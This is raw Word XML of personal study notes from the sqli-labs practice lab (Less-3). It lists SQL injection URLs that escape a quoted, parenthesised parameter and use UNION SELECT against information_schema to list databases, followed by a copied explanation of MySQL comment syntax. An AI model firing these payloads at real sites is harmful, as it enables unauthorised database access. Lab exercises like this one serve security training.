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E48" w:rsidRDefault="0083052A">
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="001A06DE">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>http://172.16.19.146:8080/sqli-labs-master/Less-3/?id=1\</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0083052A" w:rsidRDefault="0083052A"/>
    <w:p w:rsidR="0083052A" w:rsidRDefault="0083052A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A2D3A82" wp14:editId="0A1F55DB">
            <wp:extent cx="5274310" cy="2161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2A" w:rsidRDefault="0083052A">
      <w:r w:rsidRPr="0083052A">
        <w:t>http://172.16.19.146:8080/sqli-labs-master/Less-3/?id=1' and (select count(*) from users)&gt;0 and ''='</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0083052A" w:rsidRDefault="0083052A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52BF8B5D" wp14:editId="300B51B2">
            <wp:extent cx="5274310" cy="2165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2A" w:rsidRDefault="0083052A">
      <w:r w:rsidRPr="0083052A">
        <w:t>.16.19.146:8080/sqli-labs-master/Less-3/?id=1' )'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0083052A" w:rsidRDefault="0083052A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E7C0608" wp14:editId="01D1326C">
            <wp:extent cx="5274310" cy="2033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2A" w:rsidRDefault="0083052A"/>
    <w:p w:rsidR="0083052A" w:rsidRDefault="0083052A">
      <w:r w:rsidRPr="0083052A">
        <w:t>http://172.16.19.146:8080/sqli-labs-master/Less-3/?id=1' ) or ('1'='1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0083052A" w:rsidRDefault="0083052A"/>
    <w:p w:rsidR="0083052A" w:rsidRDefault="0083052A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5756C25B" wp14:editId="49DF1E84">
            <wp:extent cx="5274310" cy="2063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2A" w:rsidRDefault="0083052A"/>
    <w:p w:rsidR="0053783C" w:rsidRPr="0053783C" w:rsidRDefault="0053783C" w:rsidP="0053783C">
      <w:r w:rsidRPr="0053783C">
        <w:t>http://172.16.19.146:8080/sqli-labs-master/Less-3/?id=-1') union select 1,schema_name,3 from information_schema.schemata -- and (''='</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053783C" w:rsidRDefault="0053783C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4EFE13EC" wp14:editId="2538818B">
            <wp:extent cx="5274310" cy="1469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3C" w:rsidRPr="0053783C" w:rsidRDefault="0053783C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0083052A" w:rsidRDefault="0053783C">
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>elect</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> * from tables where (id=</w:t>
      </w:r>
      <w:r w:rsidRPr="0053783C">
        <w:t>'-1') union select 1,schema_name,3 from information_schema.schemata -- and (''=</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053783C" w:rsidRDefault="0053783C"/>
    <w:p w:rsidR="0053783C" w:rsidRDefault="0053783C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5DB1A10A" wp14:editId="6B82D7F6">
            <wp:extent cx="5274310" cy="12052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3C" w:rsidRDefault="0053783C"/>
    <w:p w:rsidR="0053783C" w:rsidRDefault="0053783C">
      <w:r w:rsidRPr="0053783C">
        <w:t>http://172.16.19.146:8080/sqli-labs-master/Less-3/?id=-1') union select 1,schema_name,3 from information_schema.schemata --  ；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053783C" w:rsidRDefault="0053783C"/>
    <w:p w:rsidR="0053783C" w:rsidRDefault="0053783C"/>
    <w:p w:rsidR="0053783C" w:rsidRDefault="0053783C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31B26482" wp14:editId="3746BE4C">
            <wp:extent cx="5274310" cy="12052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6D" w:rsidRDefault="00776D6D"/>
    <w:p w:rsidR="00776D6D" w:rsidRDefault="00776D6D"/>
    <w:p w:rsidR="00776D6D" w:rsidRDefault="00776D6D" w:rsidP="00776D6D">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:left="720"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>MySQL</w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>数据库</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>的注释</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00776D6D" w:rsidRDefault="00776D6D" w:rsidP="00776D6D">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00776D6D" w:rsidRDefault="00776D6D" w:rsidP="00776D6D">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>MySQL注释--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00776D6D" w:rsidRDefault="00776D6D" w:rsidP="00776D6D">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>今天写MySQL的function时,对内容添加注释,发现编译出错;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00776D6D" w:rsidRDefault="00776D6D" w:rsidP="00776D6D">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00776D6D" w:rsidRDefault="00776D6D" w:rsidP="00776D6D">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>查找手册才发现,”--”注释有个小小的需要注意的地方:"--"与被注释内容之间要添加空格才行;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00776D6D" w:rsidRDefault="00776D6D" w:rsidP="00776D6D">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00776D6D" w:rsidRDefault="00776D6D" w:rsidP="00776D6D">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>本以为是个小问题,谁知.... 还是在此记录一下,为了马虎先生和马虎小姐。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00776D6D" w:rsidRDefault="00776D6D" w:rsidP="00776D6D">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>MySQL注释分为两类:单行注释、多行注释。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00776D6D" w:rsidRDefault="00776D6D" w:rsidP="00776D6D">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00776D6D" w:rsidRDefault="00776D6D" w:rsidP="00776D6D">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>-&gt;单行注释有两种,格式如下:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00776D6D" w:rsidRDefault="00776D6D" w:rsidP="00776D6D">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>1、#... 以“#”号开头,直到该行行尾,全部都是注释内容;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00776D6D" w:rsidRDefault="00776D6D" w:rsidP="00776D6D">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>2、--  以“-- ”号开头,直到该行行尾,全部都是注释内容;注意:“-- ”号与注释内容之间要加有空格，否则会报错；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00776D6D" w:rsidRDefault="00776D6D" w:rsidP="00776D6D">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00776D6D" w:rsidRDefault="00776D6D" w:rsidP="00776D6D">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>多行注释格式如下:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00776D6D" w:rsidRDefault="00776D6D" w:rsidP="00776D6D">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00776D6D" w:rsidRDefault="00776D6D" w:rsidP="00776D6D">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>3、/*...*/ 该符号中间的内容全部为注释。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00776D6D" w:rsidRDefault="00776D6D" w:rsidP="00776D6D">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00776D6D" w:rsidRDefault="00776D6D" w:rsidP="00776D6D">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>至于为何在使用--注释内容时,需要添加空格,网上有很多文章,在此不多做解释。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00776D6D" w:rsidRPr="00776D6D" w:rsidRDefault="00776D6D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="00776D6D" w:rsidRPr="00776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035" w:rsidRDefault="00FD4035" w:rsidP="0053783C">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00FD4035" w:rsidRDefault="00FD4035" w:rsidP="00537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035" w:rsidRDefault="00FD4035" w:rsidP="0053783C">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00FD4035" w:rsidRDefault="00FD4035" w:rsidP="005378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8B"/>
    <w:rsid w:val="0052428B"/>
    <w:rsid w:val="0053783C"/>
    <w:rsid w:val="006F3E48"/>
    <w:rsid w:val="00776D6D"/>
    <w:rsid w:val="0083052A"/>
    <w:rsid w:val="00A40C68"/>
    <w:rsid w:val="00F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A1401"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{0EBFD30C-9539-4123-A122-0EDDFC1F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52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37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78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7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7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4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2cto.com/databas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6.19.146:8080/sqli-labs-master/Less-3/?id=1\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174</Words>
  <Characters>997</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>8</Lines>
  <Paragraphs>2</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>Microsoft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李文致</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>李文致</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-05-12T09:56:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-05-16T12:28:00Z</dcterms:modified>
</cp:coreProperties>
</file>